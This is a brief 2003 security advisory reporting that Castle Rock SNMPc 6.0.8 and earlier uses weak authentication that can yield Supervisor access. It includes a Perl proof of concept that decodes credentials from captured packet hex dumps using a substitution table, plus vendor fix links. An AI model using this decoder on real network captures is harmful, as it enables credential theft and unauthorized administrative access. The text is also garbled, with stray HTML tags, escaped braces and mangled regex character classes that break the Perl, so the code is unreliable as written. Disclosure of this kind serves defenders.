Reported August 27, 2003 by Alexander V. Nickolenko.

 

 

VERSIONS AFFECTED

 

Castle Rock SNMPc 6.0.8 and earlier

 

DESCRIPTION

 

<span style="font-family:Verdana">A vulnerability in Castle Rock SNMPc 6.0.8 and earlier can let any remote user gain Supervisor access to the vulnerable system. This vulnerability is a result of a weak authentication protocol.</h3> <span style="font-family:Verdana"> </h3>

DEMONSTRATION

 

The discoverer posted the following code as proof of concept:

 

#!/usr/bin/perl

$str='.YZ\[\\]^_PQRSTUVWHIJKLMNO@ABCDEFGxyz\{|\}~.pqrstuvwhijklmno`abcdefg................................89:;<=>?01234567()*+,-./ !"#$%&\'................................................................................................................................';

while(<>)

\{

   $s="";

   if(/^0130 /)\{

     GETIT: \{

 do \{

       s/^0130 00 00 // if /^0130/;

       s/^xdigit:\{4\} //;

       s/ .*$//ms;

       $s=$s." ".$_;

       last GETIT if ($s =~ / 00/);

     \} while (<>)

\};

     $s=~s/ 00.*$//ms;

     $s=~s/ (xdigit:\{2\}) (xdigit:\{2\})/ substr($str,(hex($1)),1).substr($str,(hex($2)),1) /ige;

     $s=~s/ (xdigit:\{2\})/ chr(hex($1)) /ige;

     print ":$s:\n";

   \}

 \}

<span style="font-family:Verdana"> </h3>

VENDOR RESPONSE

 

<span style="font-family:Verdana">Castle Rock has released fixes for versions <a href="http://www.castlerock.com/download/fix821_605.zip" style="color: blue; text-decoration: underline; text-underline: single">6.0.5</a> and <a href="http://www.castlerock.com/download/fix821_608.zip" style="color: blue; text-decoration: underline; text-underline: single">6.0.8</a> and a <a href="http://www.castlerock.com/download/snmpc519.exe" style="color: blue; text-decoration: underline; text-underline: single">full version</a> fix for release 5.1.</h3>

 

CREDIT                                                                                                       
Discovered by Alexander V. Nickolenko.